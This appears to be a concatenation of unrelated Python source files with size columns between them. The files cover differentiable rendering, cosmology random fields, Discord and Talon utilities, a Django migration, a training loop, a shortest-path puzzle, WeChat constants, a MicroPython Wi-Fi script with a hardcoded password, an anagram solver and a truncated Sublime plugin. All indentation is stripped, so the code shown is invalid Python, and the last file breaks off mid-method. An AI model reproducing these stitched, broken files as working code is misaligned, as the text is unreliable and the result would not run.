pyredner.set_use_gpu(torch.cuda.is_available())
cam = pyredner.Camera(position = torch.tensor([0.0, 0.0, -5.0]),
look_at = torch.tensor([0.0, 0.0, 0.0]),
up = torch.tensor([0.0, 1.0, 0.0]),
fov = torch.tensor([45.0]), # in degree
clip_near = 1e-2, # needs to > 0
resolution = (256, 256))
# Set "use_vertex_color = True" to use vertex color
mat_vertex_color = pyredner.Material(use_vertex_color = True)
materials = [mat_vertex_color]
vertices, indices, uvs, normals = pyredner.generate_sphere(128, 64)
# For the target we randomize the vertex color.
vertex_color = torch.zeros_like(vertices).uniform_(0.0, 1.0)
shape_sphere = pyredner.Shape(\
vertices = vertices,
indices = indices,
uvs = uvs,
normals = normals,
colors = vertex_color, # use the 'colors' field in Shape to store the color
material_id = 0)
shapes = [shape_sphere]
envmap = pyredner.imread('sunsky.exr')
if pyredner.get_use_gpu():
envmap = envmap.cuda(device = pyredner.get_device())
envmap = pyredner.EnvironmentMap(envmap)
scene = pyredner.Scene(cam, shapes, materials, [], envmap)
scene_args = pyredner.RenderFunction.serialize_scene(\
scene = scene,
num_samples = 256,
max_bounces = 1,
channels = [redner.channels.radiance, redner.channels.vertex_color])
render = pyredner.RenderFunction.apply
img = render(0, *scene_args)
img_radiance = img[:, :, :3]
img_vertex_color = img[:, :, 3:]
pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/target.exr')
pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/target.png')
pyredner.imwrite(img_vertex_color.cpu(), 'results/test_vertex_color/target_color.png')
target_radiance = pyredner.imread('results/test_vertex_color/target.exr')
if pyredner.get_use_gpu():
target_radiance = target_radiance.cuda()
# Initial guess. Set to 0.5 for all vertices.
shape_sphere.colors = \
torch.zeros_like(vertices, device = pyredner.get_device()) + 0.5
shape_sphere.colors.requires_grad = True
# We render both the radiance and the vertex color here.
# The vertex color is only for visualization.
scene_args = pyredner.RenderFunction.serialize_scene(\
scene = scene,
num_samples = 256,
max_bounces = 1,
channels = [redner.channels.radiance, redner.channels.vertex_color])
img = render(1, *scene_args)
img_radiance = img[:, :, :3]
img_vertex_color = img[:, :, 3:]
pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/init.png')
pyredner.imwrite(img_vertex_color.cpu(), 'results/test_vertex_color/init_color.png')
diff = torch.abs(target_radiance - img_radiance)
pyredner.imwrite(diff.cpu(), 'results/test_vertex_color/init_diff.png')
optimizer = torch.optim.Adam([shape_sphere.colors], lr=1e-2)
for t in range(100):
print('iteration:', t)
optimizer.zero_grad()
scene_args = pyredner.RenderFunction.serialize_scene(\
scene = scene,
num_samples = 4,
max_bounces = 1,
channels = [redner.channels.radiance, redner.channels.vertex_color])
img = render(t+1, *scene_args)
img_radiance = img[:, :, :3]
img_vertex_color = img[:, :, 3:]
pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/iter_{}.png'.format(t))
pyredner.imwrite(img_vertex_color.cpu(), 'results/test_vertex_color/iter_color_{}.png'.format(t))
loss = torch.pow(img_radiance - target_radiance, 2).sum()
print('loss:', loss.item())
loss.backward()
optimizer.step()
# Clamp the data to valid range.
shape_sphere.colors.data.clamp_(0.0, 1.0)
scene_args = pyredner.RenderFunction.serialize_scene(\
scene = scene,
num_samples = 256,
max_bounces = 1,
channels = [redner.channels.radiance, redner.channels.vertex_color])
img = render(102, *scene_args)
img_radiance = img[:, :, :3]
img_vertex_color = img[:, :, 3:]
pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/final.exr')
pyredner.imwrite(img_radiance.cpu(), 'results/test_vertex_color/final.png')
pyredner.imwrite(img_vertex_color.cpu(), 'results/test_vertex_color/final_color.png')
pyredner.imwrite(torch.abs(target_radiance - img_radiance).cpu(), 'results/test_vertex_color/final_diff.png')
from subprocess import call
call(["ffmpeg", "-framerate", "24", "-i",
"results/test_vertex_color/iter_%d.png", "-vb", "20M",
"results/test_vertex_color/out.mp4"])
call(["ffmpeg", "-framerate", "24", "-i",
"results/test_vertex_color/iter_color_%d.png", "-vb", "20M",
"results/test_vertex_color/out_color.mp4"]) | 4,718 | 1,787 |
import numpy as np
import os
from ..analysis import Sensitivity
from ..physics import Cosmology
from ..physics.Constants import c, cm_per_mpc
from ..util.ParameterFile import ParameterFile
from .FourierSpace import FourierSpace
"""
------------
Instructions
------------
The GRF module allows the user to generate realizations of a Gaussian random field with an input power spectrum, and
compute power spectrum from a given map of fluctuations in real space.
This module has benefited a lot from the imapper2 package developed by Tony Li.
"""
class GaussianRandomField(FourierSpace):
def __init__(self, **kwargs):
FourierSpace.__init__(self, **kwargs)
self.pf = ParameterFile(**kwargs)
# Get the redshift of the interested signal
self._z = self.pf.grf_params['grf_z_signal']
# Specify the survey geometry
self._survey_goemetry = np.array([self.pf.grf_params['grf_geom_x'],
self.pf.grf_params['grf_geom_y'],
self.pf.grf_params['grf_geom_z']])
# Get the wavelength [cm] of the interested signal
self.wv_signal = self.pf.grf_params['grf_lambda_signal']
# Get the assumed aperture size (diameter) of dish
self.d_ap = self.pf.grf_params['grf_d_ap']
self._powerspectrum_in = self.pf.grf_params['grf_ps_in']
@property
def cosm(self):
if not hasattr(self, '_cosm'):
self._cosm = Cosmology(
omega_m_0=self.pf.cosmo_params['omega_m_0'],
omega_l_0=self.pf.cosmo_params['omega_l_0'],
omega_b_0=self.pf.cosmo_params['omega_b_0'],
hubble_0=self.pf.cosmo_params['hubble_0'],
helium_by_number=self.pf.cosmo_params['helium_by_number'],
cmb_temp_0=self.pf.cosmo_params['cmb_temp_0'],
approx_highz=self.pf.cosmo_params['approx_highz'],
sigma_8=self.pf.cosmo_params['sigma_8'],
primordial_index=self.pf.cosmo_params['primordial_index'])
return self._cosm
@property
def sens(self, **kwargs):
if not hasattr(self, '_sens'):
self._sens = Sensitivity(**kwargs)
return self._sens
@property
def z(self):
if not hasattr(self, '_z'):
raise ValueError('must specify a redshift for which the fluctuations of target signal will be simulated!')
return self._z
@z.setter
def z(self, value):
if value in [6.0]:
self._z = value
else:
raise ValueError('invalid signal redshift!')
@property
def survey_goemetry(self):
if not hasattr(self, '_survey_goemetry'):
raise ValueError('must specify a survey geometry for the simulation!')
return self._survey_goemetry
@survey_goemetry.setter
def survey_goemetry(self, value):
if (np.alltrue(value>0)) and (np.size(value)==3):
self._survey_goemetry = value
#print 'updated default geometry to %s!'%(self._survey_goemetry)
else:
raise ValueError('input survey geometry invalid!')
@property
def PowerSpectrum(self):
if not hasattr(self, '_PowerSpectrum'):
raise ValueError('To simulate a GRF, must supply an input PS!')
return self._PowerSpectrum
@PowerSpectrum.setter
def PowerSpectrum(self, value):
if callable(value):
self._PowerSpectrum = value
else:
raise ValueError('Input power spectrum must be a callable function of k!')
@property
def n_ch_x(self):
return self.survey_goemetry[0]
@property
def n_ch_y(self):
return self.survey_goemetry[1]
@property
def n_ch_z(self):
return self.survey_goemetry[2]
@property
def n_beam(self):
return self.survey_goemetry[0] * self.survey_goemetry[1]
@property
def n_channel(self):
return self.survey_goemetry[-1]
def SetGrid(self, L_x, L_y, L_z):
"""
Set x (real space) and k (fourier space) grids
----------------------------------------
:param L_x: length of survey volume along 1st dimension; {scalar}
:param L_y: length of survey volume along 2nd dimension; {scalar}
:param L_z: length of survey volume along 3rd (LOS) dimension; {scalar}
:return:
"""
_lslab_x = L_x
_lslab_y = L_y
_lslab_z = L_z
# Define the large simulation box within which the survey volume is embedded
_lsim_x = _lsim_y = _lsim_z = _lslab_z # Mpc h^-1
_dx = _lslab_x / self.n_ch_x # Mpc h^-1
_dy = _lslab_y / self.n_ch_y # Mpc h^-1
_dz = _lslab_z / self.n_ch_z # Mpc h^-1
self.nx_sim = int(np.round(_lsim_x / _dx))
self.ny_sim = int(np.round(_lsim_y / _dy))
self.nz_sim = int(np.round(_lsim_z / _dz))
self.xs = np.linspace(-self.nx_sim//2 + self.nx_sim%2, self.nx_sim//2 - 1 + self.nx_sim%2, self.nx_sim) * _dx
self.ys = np.linspace(-self.ny_sim//2 + self.ny_sim%2, self.ny_sim//2 - 1 + self.ny_sim%2, self.ny_sim) * _dy
self.zs = np.linspace(-self.nz_sim//2 + self.nz_sim%2, self.nz_sim//2 - 1 + self.nz_sim%2, self.nz_sim) * _dz
self.r = np.sqrt(self.xs[:,np.newaxis,np.newaxis]**2 + self.ys[np.newaxis,:,np.newaxis]**2 + self.zs[np.newaxis,np.newaxis,:]**2)
sim = np.zeros((self.nx_sim, self.ny_sim, self.nz_sim), float)
self.npix_cen = self.nx_sim // 2 - 1
if self.n_ch_y==1:
# real-space weighting function
sim[int(self.npix_cen - (self.n_beam // 2)):int(self.npix_cen + (self.n_beam // 2)), self.npix_cen, 0:] = 1.0
else:
raise NotImplementedError('help!')
_kx = 2*np.pi * np.fft.fftfreq(self.nx_sim, _dx)
_ky = 2*np.pi * np.fft.fftfreq(self.ny_sim, _dy)
_kz = 2*np.pi * np.fft.fftfreq(self.nz_sim, _dz)
_dkx = abs(_kx[1] - _kx[0])
_dky = abs(_ky[1] - _ky[0])
_dkz = abs(_kz[1] - _kz[0])
self.k = np.sqrt(_kx[:,np.newaxis,np.newaxis]**2 + _ky[np.newaxis,:,np.newaxis]**2 + _kz[np.newaxis,np.newaxis,:]**2)
_box_vol = _lsim_x * _lsim_y * _lsim_z
_pix_vol = _box_vol / (self.nx_sim * self.ny_sim * self.nz_sim)
self.scale_factor = np.sqrt(_pix_vol**2 / _box_vol)
def GenerateGRF(self, L_x, L_y, L_z, n_samples=1):
"""
Generate Gaussian random field according to the provided geometry and power spectrum
----------------------------------------
:param L_x: length of survey volume along 1st dimension; {scalar}
:param L_y: length of survey volume along 2nd dimension; {scalar}
:param L_z: length of survey volume along 3rd (LOS) dimension; {scalar}
:param n_samples: number of GRF realizations to generate
:return:
"""
self.fn = 'grf_samples_x%dy%dz%d_N%d' % (self.n_ch_x, self.n_ch_y, self.n_ch_z, n_samples)
if not callable(self.PowerSpectrum): raise TypeError('Input power spectrum must be a callable function of k!')
self.survey_maps = np.zeros((self.n_ch_x, self.n_ch_y, self.n_ch_z, n_samples))
print('\nGenerating x (real space) and k (fourier space) grids...')
self.SetGrid(L_x=L_x, L_y=L_y, L_z=L_z)
print('\nReading in power spectrum...')
try:
Pk = self.PowerSpectrum(self.k)
assert Pk[Pk >= 0.0].size == Pk.size
except:
raise ValueError('Oops!')
print('\nGenerating GRF realizations...')
if self.n_ch_y == 1:
for i in range(n_samples):
# Generate real and imaginary parts
rand = np.random.RandomState(seed=(42 + i))
realspace_vec_r = rand.normal(loc=0.0, scale=1.0, size=self.r.shape)
realspace_vec_i = rand.normal(loc=0.0, scale=1.0, size=self.r.shape)
realspace_map = (realspace_vec_r + realspace_vec_i * 1.0j)
fourierspace_map = np.fft.fftn(realspace_map) / np.sqrt(self.nx_sim * self.ny_sim * self.nz_sim)
ft_map = np.sqrt(Pk) * fourierspace_map / self.scale_factor
ft_map[0, 0, 0] = 0.0
full_map = np.fft.ifftn(ft_map)
full_map = np.real(full_map)
survey_map = full_map[int(self.npix_cen-(self.n_ch_x//2)):int(self.npix_cen+(self.n_ch_x//2)), self.npix_cen, :]
self.survey_maps[:, 0, :, i] = survey_map
print('%d out of %d realizations completed!'%(i+1, n_samples))
self.survey_map_coords = [self.xs[int(self.npix_cen-(self.n_ch_x//2)):int(self.npix_cen+(self.n_ch_x//2))], None, self.zs]
else:
raise NotImplementedError('help!')
self.save()
print('\n--- DONE ---\n')
def save(self, format='npz'):
"""
Save derived window functions to file
----------------------------------------
:param format: format of output file; {str}
"""
_path = os.getenv('STARTERLITE') + '/output/grf/%s.%s' % (self.fn, format)
_wf_dict = {'grf': self.survey_maps, 'coords': self.survey_map_coords}
np.savez(_path, **_wf_dict)
def GetObsPS2D_NoAvg(self, ps3d, T_matrix_path):
"""
Obtain the observed 2D PS for a given true, 3D PS and a projection (WF) matrix
----------------------------------------
:param ps3d: true spatial power spectrum; {callable function}
:param T_matrix_path: path to transfer matrix; {str}
:return: observed power spectrum and bin edges
"""
T_matrix_data = np.load(T_matrix_path)
T_matrix = T_matrix_data['T_matrix'] # of size (NKx * NKz, Nkbins)
k3d_bins = T_matrix_data['k3d_bins']
K2D_bins = T_matrix_data['K2D_matrix'] # of size (NKx * NKz, 2)
PS2D_from_mat = np.matmul(T_matrix, ps3d(k3d_bins))
return K2D_bins, PS2D_from_mat | 10,066 | 3,616 |
"""A collection of utility functions for performing typing and error checking on discord.ext.commands.Context objects."""
from typing import List, Optional, Union
# Third party imports
import discord
from discord.ext import commands
# First party imports
import botpumpkin.discord.guild as guild_util
# *** get_guild *************************************************************
def get_guild(context: commands.Context) -> discord.Guild:
"""Return the guild from the given context.
Args:
context (commands.Context): The context to return the guild from.
Raises:
ValueError: Raised if the context contains no guild.
Returns:
discord.Guild: The guild from the given context.
"""
guild: Optional[discord.Guild] = context.guild
if guild is None:
raise ValueError("context.guild has no value")
return guild
# *** get_guild_channels ****************************************************
def get_guild_channels(context: commands.Context) -> List[Union[discord.TextChannel, discord.VoiceChannel, discord.CategoryChannel, discord.StoreChannel]]:
"""Return a list of all channels from the given context.
Args:
context (commands.Context): The context to return all channels from.
Raises:
ValueError: Raised if the guild from the given context has no list of channels.
Returns:
List[Union[discord.TextChannel, discord.VoiceChannel, discord.CategoryChannel, discord.StoreChannel]]: The list of channels from the given context.
"""
channels: List[Union[discord.TextChannel, discord.VoiceChannel, discord.CategoryChannel, discord.StoreChannel]] = get_guild(context).channels
if channels is None:
raise ValueError("context.guild.channels has no value")
return channels
# *** get_channel ***********************************************************
def get_channel(context: commands.Context) -> discord.TextChannel:
"""Return the channel from the given context.
Args:
context (commands.Context): The context to return the channel from.
Raises:
ValueError: Raised if the channel is not a TextChannel, which means the channel is not from a guild.
Returns:
discord.TextChannel: The channel from the given context.
"""
channel: Union[discord.TextChannel, discord.DMChannel, discord.GroupChannel] = context.channel
if not isinstance(channel, discord.TextChannel):
raise ValueError("Channel is not from guild")
return channel
# *** get_channel_by_name ***************************************************
def get_channel_by_name(context: commands.Context, channel_name: str) -> discord.TextChannel:
"""Return the channel from the list of channels in the given context that has the given name.
Args:
context (commands.Context): The context to return the channel from.
channel_name (int): The name of the channel to return.
Returns:
discord.TextChannel: The channel with the given name from the given context.
"""
return guild_util.get_channel_by_name(get_guild(context), channel_name)
# *** get_author ************************************************************
def get_author(context: commands.Context) -> discord.Member:
"""Return the member who sent the message for the given context.
Args:
context (commands.Context): The context to return the author from.
Returns:
discord.Member: The author for the given context.
"""
author: Union[discord.User, discord.Member] = context.author
if not isinstance(author, discord.Member):
raise ValueError("Author is not from guild")
return author
| 3,679 | 980 |
import typing
import os
import json
from talon import Module, Context, canvas, screen, ui, ctrl, settings
from talon.skia import Paint, Rect
from talon.types.point import Point2d
mod = Module()
ctx = Context()
mod.tag('fine_grid_enabled', desc='Tag enables fine grid commands')
class FineMouseGrid:
ZOOM_RATIO = 0.6
def __init__(self):
self.screen = None
self.mcanvas = None
self.rect = None
self.active = False
letters = [chr(97 + i) for i in range(26)]
numbers = [str(i) for i in range(10)]
self.columns = letters + numbers
self.rows = letters + numbers
def setup(self, *, screen_num: int = None):
screens = ui.screens()
# each if block here might set the rect to None to indicate failure
if screen_num is not None:
screen = screens[screen_num % len(screens)]
else:
screen = screens[0]
if not self.rect:
rect = screen.rect
self.rect = rect.copy()
self.screen = screen
if self.mcanvas is not None:
self.mcanvas.close()
self.mcanvas = canvas.Canvas.from_screen(screen)
self.mcanvas.register("draw", self.draw)
self.mcanvas.freeze()
def draw(self, canvas):
def draw_text(offset_x, offset_y, width, height):
row_height = height / len(self.rows)
column_width = width / len(self.columns)
canvas.paint.text_align = canvas.paint.TextAlign.CENTER
canvas.paint.textsize = 16
for row, row_char in enumerate(self.rows):
for col, col_char in enumerate(self.columns):
coordinate_x = offset_x + column_width * (col + 0.5)
coordinate_y = offset_y + row_height * (row + 0.5)
text_string = f"{row_char}{col_char}"
text_rect = canvas.paint.measure_text(text_string)[1]
background_rect = text_rect.copy()
background_rect.center = Point2d(
coordinate_x,
coordinate_y,
)
background_rect = background_rect.inset(-4)
canvas.paint.color = "9999994f"
canvas.paint.style = Paint.Style.FILL
canvas.draw_rect(background_rect)
canvas.paint.color = "00ff008f"
canvas.draw_text(
text_string,
coordinate_x,
coordinate_y + text_rect.height / 2,
)
draw_text(self.rect.x, self.rect.y, self.rect.width, self.rect.height)
self.active = True
def close(self):
self.mcanvas.unregister("draw", self.draw)
self.mcanvas.close()
self.mcanvas = None
self.active = False
def reset(self):
self.rect = None
self.redraw()
def redraw(self):
self.close()
self.setup()
self.draw(self.mcanvas)
def get_coordinate(self, row: str, column: str):
column_index = self.columns.index(column)
row_index = self.rows.index(row)
x = self.rect.x + self.rect.width * (column_index + 0.5) / len(self.columns)
y = self.rect.y + self.rect.height * (row_index + 0.5) / len(self.rows)
return x, y
def go_coordinate(self, row: str, column: str):
ctrl.mouse_move(*self.get_coordinate(row, column))
def zoom(self, row: str, column: str):
x, y = self.get_coordinate(row, column)
xnew_min = self.rect.x
xnew_max = self.rect.x + (1 - self.ZOOM_RATIO)*self.rect.width
xnew = x - 0.5*self.ZOOM_RATIO*self.rect.width
self.rect.x = max(min(xnew, xnew_max), xnew_min)
ynew_min = self.rect.y
ynew_may = self.rect.y + (1 - self.ZOOM_RATIO)*self.rect.height
ynew = y - 0.5*self.ZOOM_RATIO*self.rect.height
self.rect.y = max(min(ynew, ynew_may), ynew_min)
self.rect.width = self.ZOOM_RATIO*self.rect.width
self.rect.height = self.ZOOM_RATIO*self.rect.height
self.redraw()
grid = FineMouseGrid()
@mod.capture(rule="(<user.letter> | <user.number_key>) (<user.letter> | <user.number_key>)")
def coordinate(m) -> str:
"column or row character"
return ','.join(m)
@mod.action_class
class GridActions:
def fine_grid_activate():
"""activate chess board"""
ctx.tags = ['user.fine_grid_enabled']
grid.rect = None
if not grid.mcanvas:
grid.setup()
grid.draw(grid.mcanvas)
def fine_grid_close():
"""Close the chessboard"""
print(ctx.tags)
grid.close()
ctx.tags = []
def go_coordinate(coordinate: str):
"""select coordinate"""
print(coordinate)
row, column = coordinate.split(',')
grid.go_coordinate(row, column)
def zoom(coordinate: str):
"""zoom"""
row, column = coordinate.split(',')
grid.zoom(row, column)
def fine_grid_reset():
"""reset grid to original state"""
grid.reset()
| 5,180 | 1,650 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2017-10-11 13:10
from __future__ import unicode_literals
from django.db import migrations
import molo.surveys.blocks
import wagtail.core.blocks
class Migration(migrations.Migration):
dependencies = [
('surveys', '0013_add_streamfield_for_skip_logic'),
]
operations = [
migrations.AlterModelOptions(
name='molosurveyformfield',
options={'ordering': ['sort_order']},
),
migrations.AlterModelOptions(
name='personalisablesurveyformfield',
options={'ordering': ['sort_order'], 'verbose_name': 'personalisable form field'},
),
migrations.AlterField(
model_name='molosurveyformfield',
name='skip_logic',
field=molo.surveys.blocks.SkipLogicField([(b'skip_logic', wagtail.core.blocks.StructBlock([(b'choice', wagtail.core.blocks.CharBlock()), (b'skip_logic', wagtail.core.blocks.ChoiceBlock(choices=[(b'next', b'Next default question'), (b'end', b'End of survey'), (b'question', b'Another question'), (b'survey', b'Another survey')])), (b'survey', wagtail.core.blocks.PageChooserBlock(required=False, target_model='surveys.MoloSurveyPage')), (b'question', molo.surveys.blocks.QuestionSelectBlock(help_text=b'Please save the survey as a draft to populate or update the list of questions.', required=False))]))], blank=True, verbose_name=b'Answer options'),
),
migrations.AlterField(
model_name='personalisablesurveyformfield',
name='skip_logic',
field=molo.surveys.blocks.SkipLogicField([(b'skip_logic', wagtail.core.blocks.StructBlock([(b'choice', wagtail.core.blocks.CharBlock()), (b'skip_logic', wagtail.core.blocks.ChoiceBlock(choices=[(b'next', b'Next default question'), (b'end', b'End of survey'), (b'question', b'Another question'), (b'survey', b'Another survey')])), (b'survey', wagtail.core.blocks.PageChooserBlock(required=False, target_model='surveys.MoloSurveyPage')), (b'question', molo.surveys.blocks.QuestionSelectBlock(help_text=b'Please save the survey as a draft to populate or update the list of questions.', required=False))]))], blank=True, verbose_name=b'Answer options'),
),
]
| 2,261 | 749 |
from ..super import SupTrainer
from tqdm import tqdm
import torch
from jdit.optimizer import Optimizer
from jdit.model import Model
from jdit.dataset import DataLoadersFactory
class SupSingleModelTrainer(SupTrainer):
""" This is a Single Model Trainer.
It means you only have one model.
input, gound_truth
output = model(input)
loss(output, gound_truth)
"""
def __init__(self, logdir, nepochs, gpu_ids_abs, net: Model, opt: Optimizer, datasets: DataLoadersFactory):
super(SupSingleModelTrainer, self).__init__(nepochs, logdir, gpu_ids_abs=gpu_ids_abs)
self.net = net
self.opt = opt
self.datasets = datasets
self.fixed_input = None
self.input = None
self.output = None
self.ground_truth = None
def train_epoch(self, subbar_disable=False):
for iteration, batch in tqdm(enumerate(self.datasets.loader_train, 1), unit="step", disable=subbar_disable):
self.step += 1
self.input, self.ground_truth = self.get_data_from_batch(batch, self.device)
self.output = self.net(self.input)
self._train_iteration(self.opt, self.compute_loss, csv_filename="Train")
if iteration == 1:
self._watch_images("Train")
def get_data_from_batch(self, batch_data: list, device: torch.device):
""" Load and wrap data from the data lodaer.
Split your one batch data to specify variable.
Example::
# batch_data like this [input_Data, ground_truth_Data]
input_cpu, ground_truth_cpu = batch_data[0], batch_data[1]
# then move them to device and return them
return input_cpu.to(self.device), ground_truth_cpu.to(self.device)
:param batch_data: one batch data load from ``DataLoader``
:param device: A device variable. ``torch.device``
:return: input Tensor, ground_truth Tensor
"""
input_tensor, ground_truth_tensor = batch_data[0], batch_data[1]
return input_tensor, ground_truth_tensor
def _watch_images(self, tag: str, grid_size: tuple = (3, 3), shuffle=False, save_file=True):
""" Show images in tensorboard
To show images in tensorboad. If want to show fixed input and it's output,
please use ``shuffle=False`` to fix the visualized data.
Otherwise, it will sample and visualize the data randomly.
Example::
# show fake data
self.watcher.image(self.output,
self.current_epoch,
tag="%s/output" % tag,
grid_size=grid_size,
shuffle=shuffle,
save_file=save_file)
# show ground_truth
self.watcher.image(self.ground_truth,
self.current_epoch,
tag="%s/ground_truth" % tag,
grid_size=grid_size,
shuffle=shuffle,
save_file=save_file)
# show input
self.watcher.image(self.input,
self.current_epoch,
tag="%s/input" % tag,
grid_size=grid_size,
shuffle=shuffle,
save_file=save_file)
:param tag: tensorboard tag
:param grid_size: A tuple for grad size which data you want to visualize
:param shuffle: If shuffle the data.
:param save_file: If save this images.
:return:
"""
self.watcher.image(self.output,
self.current_epoch,
tag="%s/output" % tag,
grid_size=grid_size,
shuffle=shuffle,
save_file=save_file)
self.watcher.image(self.ground_truth,
self.current_epoch,
tag="%s/ground_truth" % tag,
grid_size=grid_size,
shuffle=shuffle,
save_file=save_file)
def compute_loss(self) -> (torch.Tensor, dict):
""" Rewrite this method to compute your own loss Discriminator.
Use self.input, self.output and self.ground_truth to compute loss.
You should return a **loss** for the first position.
You can return a ``dict`` of loss that you want to visualize on the second position.like
Example::
var_dic = {}
var_dic["LOSS"] = loss_d = (self.output ** 2 - self.groundtruth ** 2) ** 0.5
return: loss, var_dic
"""
loss: torch.Tensor
var_dic = {}
return loss, var_dic
def compute_valid(self) -> dict:
""" Rewrite this method to compute your validation values.
Use self.input, self.output and self.ground_truth to compute valid loss.
You can return a ``dict`` of validation values that you want to visualize.
Example::
# It will do the same thing as ``compute_loss()``
var_dic, _ = self.compute_loss()
return var_dic
"""
# It will do the same thing as ``compute_loss()``
var_dic, _ = self.compute_loss()
return var_dic
def valid_epoch(self):
"""Validate model each epoch.
It will be called each epoch, when training finish.
So, do same verification here.
Example::
avg_dic: dict = {}
self.net.eval()
for iteration, batch in enumerate(self.datasets.loader_valid, 1):
self.input, self.ground_truth = self.get_data_from_batch(batch, self.device)
with torch.no_grad():
self.output = self.net(self.input)
dic: dict = self.compute_valid()
if avg_dic == {}:
avg_dic: dict = dic
else:
for key in dic.keys():
avg_dic[key] += dic[key]
for key in avg_dic.keys():
avg_dic[key] = avg_dic[key] / self.datasets.nsteps_valid
self.watcher.scalars(avg_dic, self.step, tag="Valid")
self.loger.write(self.step, self.current_epoch, avg_dic, "Valid", header=self.step <= 1)
self._watch_images(tag="Valid")
self.net.train()
"""
avg_dic: dict = {}
self.net.eval()
for iteration, batch in enumerate(self.datasets.loader_valid, 1):
self.input, self.ground_truth = self.get_data_from_batch(batch, self.device)
with torch.no_grad():
self.output = self.net(self.input)
dic: dict = self.compute_valid()
if avg_dic == {}:
avg_dic: dict = dic
else:
# 求和
for key in dic.keys():
avg_dic[key] += dic[key]
for key in avg_dic.keys():
avg_dic[key] = avg_dic[key] / self.datasets.nsteps_valid
self.watcher.scalars(avg_dic, self.step, tag="Valid")
self.loger.write(self.step, self.current_epoch, avg_dic, "Valid", header=self.current_epoch <= 1)
self._watch_images(tag="Valid")
self.net.train()
def test(self):
pass
| 7,355 | 2,124 |
import heapq
import sys
primes = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53]
bounds = [1]
for pr in primes:
bounds.append(bounds[-1]*pr)
def gold(town_id):
i = 0
while bounds[i] <= town_id:
i += 1
return i - 1
def solve():
N, M = [int(i) for i in raw_input().split()]
ids = [int(raw_input()) for _ in xrange(N)]
town_gold = {town_id: gold(town_id) for town_id in ids}
adj = {}
for i in ids:
adj[i] = []
for _ in xrange(M):
i, j, w = [int(i) for i in raw_input().split()]
adj[i].append((j, w))
adj[j].append((i, w))
start, end = min(ids), max(ids)
visited = set()
max_dist = sys.maxint/2
min_dist = {town_id: max_dist for town_id in ids}
min_dist[start] = 0
queue = [(0, -gold(start), start)]
while queue:
curr_dist, curr_gold, curr_node = heapq.heappop(queue)
if curr_node in visited:
continue
if curr_node == end:
print -curr_gold
break
for next_node, dist in adj[curr_node]:
if next_node in visited:
continue
next_dist = curr_dist + dist
if min_dist[next_node] >= next_dist:
min_dist[next_node] = next_dist
heapq.heappush(queue, (next_dist, curr_gold-town_gold[next_node], next_node))
def main():
solve()
if __name__ == "__main__":
main()
| 1,433 | 554 |
# -*- encoding: utf-8
from .utils import build_user_agent
# common
DEFAULT_HEADERS = {
'User-Agent': build_user_agent()
}
TIMEOUT = 1
ENCODING = 'utf-8'
RETRYS = 3
RETRY_BACKOFF_FACTOR = 0.1
RETRY_STATUS_FORCELIST = frozenset([500, 502, 504])
# auth
OAUTH_HOST = 'open.weixin.qq.com'
AUTH_EXPIRED_CODES = frozenset([40001, 40014, 41001, 42001])
# pay
TRADE_TYPE_JSAPI = 'JSAPI' # 公众号支付
TRADE_TYPE_NATIVE = 'NATIVE' # 扫码支付
TRADE_TYPE_APP = 'APP' # APP支付
SIGN_TYPE = 'MD5'
SIGN_NONCE_STR_LEN = 32
| 511 | 288 |
try:
import usocket as socket
except:
import socket
from time import sleep
from machine import Pin
import onewire, ds18x20
import network
import esp
esp.osdebug(None)
import gc
gc.collect()
ds_pin = Pin(4)
ds_sensor = ds18x20.DS18X20(onewire.OneWire(ds_pin))
ssid = 'ATC24'
password = 'Svalbard'
station = network.WLAN(network.STA_IF)
station.active(True)
station.connect(ssid, password)
while station.isconnected() == False:
pass
#print(station.ifconfig())
print('Connection successful')
print(station.ifconfig()) | 533 | 201 |
"""
Given two strings s and t , write a function to determine if t is an anagram of s.
Example 1:
Input: s = "anagram", t = "nagaram"
Output: true
Example 2:
Input: s = "rat", t = "car"
Output: false
Note:
You may assume the string contains only lowercase alphabets.
Follow up:
What if the inputs contain unicode characters? How would you adapt your solution to such case?
"""
from collections import Counter
class Solution:
def isAnagram1(self, s, t):
return sorted(s) == sorted(t)
def isAnagram2(self, s, t):
if len(s) != len(t):
return False
d_s = {}
d_t = {}
for ss, tt in zip(s, t):
if ss in d_s:
d_s[ss] += 1
else:
d_s[ss] = 1
if tt in d_t:
d_t[tt] += 1
else:
d_t[tt] = 1
return d_s == d_t
def isAnagram3(self, s, t): # 28ms, 13MB
return Counter(s) == Counter(t) if len(s) == len(t) else False
| 1,070 | 368 |
import os
import re
import sublime
import sublime_plugin
import subprocess
STVER = int(sublime.version())
class PHPCSFixer():
def __init__(self):
self.settings = PhpCsFixerSettings()
if sublime.active_window() is not None and sublime.active_window().active_view() is not None:
self.file = sublime.active_window().active_view().file_name()
def run(self, file=None):
if file is None:
file = self.file
if not self.settings.isPHPFile():
return
if not self.settings.isAllowedExtension(file):
return
cmd = self.buildCommand(file)
result = self.execute(cmd)
self.showOutput(result)
def buildCommand(self, file):
rules = self.settings.get('rules')
if (self.settings.get('executable')):
cmd = [self.settings.get('executable')]
else:
cmd = ['php-cs-fixer']
cmd.append('fix');
cmd.append(os.path.normpath(file))
cmd.append('-vvv')
cmd.append('--using-cache=no')
if rules is None or not rules:
return cmd
rules_list = '--rules='
for rule in rules:
rules_list += rule + ','
cmd.append(rules_list[:-1])
return cmd
def execute(self, cmd):
process = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
return process.communicate()[0].decode()
def showOutput(self, result):
lines = re.finditer('.*(?P<line>\d+)\) (?P<file>.*)', result)
files = []
for line in lines:
file = line.group('file')
rules = file[file.find("(")+1:file.find(")")]
file = re.sub('\(.*?\)','', file)
files.append([os.path.basename(file), rules])
sublime.active_window().show_quick_panel(files, self.onDone)
def onDone(selected, self):
return
class PhpCsFixerFixCommand(sublime_plugin.TextCommand):
def run(edit, self):
PHPCSFixer().run()
class PhpCsFixerEventListener(sublime_plugin.EventListener):
def on_post_save(self, view):
settings = PhpCsFixerSettings()
if not settings.get('on_save'):
return
PHPCSFixer().run(view.file_name())
class PhpCsFixerSettings():
def __init__(self):
if sublime.active_window() is not None and sublime.active_window().active_view() is not None:
